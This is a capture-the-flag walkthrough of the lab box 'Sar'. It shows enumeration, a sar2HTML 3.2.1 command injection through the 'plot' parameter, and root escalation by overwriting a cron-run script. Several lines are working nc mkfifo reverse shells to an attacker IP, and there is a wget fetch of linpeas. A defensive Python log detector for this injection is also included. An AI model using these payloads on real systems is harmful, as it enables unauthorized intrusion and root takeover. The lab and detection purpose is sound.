Proving Grounds Play: Sar

RATING

Easy

ENUMERATION

First, we kick it off with our usual nmap scan for these types of boxes:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.177.35

Navigating over to the target in our browser, all we see is an Apache2 default page. So, we proceed with a directory bruteforce using feroxbuster:

Command: feroxbuster -u http://192.168.177.35/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200

Checking out robots.txt, we find the sar2HTML directory:

Navigating over to the sar2HTML directory, we see that it’s running version 3.2.1 of sar2html:

Using searchsploit, we look up sar2html and see that it has a remote code execution exploit:

EXPLOITATION

To use this exploit, we build an nc mkfifo reverse shell with revshells and URL-encode it:

Reverse shell: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.45.205%201234%20%3E%2Ftmp%2Ff

We start a netcat listener on port 1234 and navigate over to:

http://192.168.177.35/sar2HTML/index.php?plot=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.45.205%201234%20%3E%2Ftmp%2Ff

And catch our shell as user www-data:
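From the defender's side, the request above is easy to spot in the Apache access log once the query string is URL-decoded. The following detection check is an added example, not part of the original walkthrough: it parses access-log lines, decodes the sar2HTML plot parameter and flags values that carry shell metacharacters. The log lines are constructed to mirror this box; the combined log format and the field names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-format lines: a benign sar2HTML request, the
# injection request from this walkthrough, and an unrelated robots.txt hit.
SAMPLE_LOG = """\
192.168.45.205 - - [10/Mar/2024:12:00:01 +0000] "GET /sar2HTML/index.php?plot=sar01 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
192.168.45.205 - - [10/Mar/2024:12:00:09 +0000] "GET /sar2HTML/index.php?plot=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.45.205%201234%20%3E%2Ftmp%2Ff HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.45.205 - - [10/Mar/2024:12:00:15 +0000] "GET /robots.txt HTTP/1.1" 200 31 "-" "curl/8.0"
"""

# Minimal combined-log parser: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate plot value is a sar data file name; none of these belong in it.
SHELL_META = re.compile(r'[;|&`]|\$\(')


def parse_query(query):
    """Split a raw query string on '&' only and decode each key and value.
    Done by hand so a literal ';' in a value is never treated as a separator."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def flag_sar2html_injection(line):
    """Return a finding for a sar2HTML index.php request whose plot parameter
    contains shell metacharacters, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.lower().endswith('/sar2html/index.php'):
        return None
    for value in parse_query(parts.query).get('plot', []):
        if SHELL_META.search(value):
            return {'ip': m.group('ip'), 'time': m.group('ts'),
                    'status': m.group('status'), 'plot': value}
    return None


def scan_log(text):
    """Run the check over every line of an access log and collect findings."""
    return [f for f in map(flag_sar2html_injection, text.splitlines()) if f]
```

Decoding before matching matters: the literal `;` after `plot=` is visible in the raw line, but the rest of the command only appears once `%3B`, `%7C` and `%26` are decoded.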

PRIVILEGE ESCALATION

We run a simple python3 web server on our local machine and transfer linpeas.sh over to our target:

Command: python3 -m http.server 80 (on attacker machine)

Command: wget http://192.168.45.205/linpeas.sh (on target)

Running this script, we discover that a cron job is running a script named finally.sh as root every 5 minutes:

Taking a look at the contents of this script, we can see that it executes another file named write.sh:

We simply overwrite the contents of write.sh with our nc mkfifo reverse shell (using a different port):

Reverse shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.205 443 >/tmp/f

Command: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.205 443 >/tmp/f" > write.sh

After starting our netcat listener on port 443 and waiting 5 minutes, we catch our root shell and read our flag: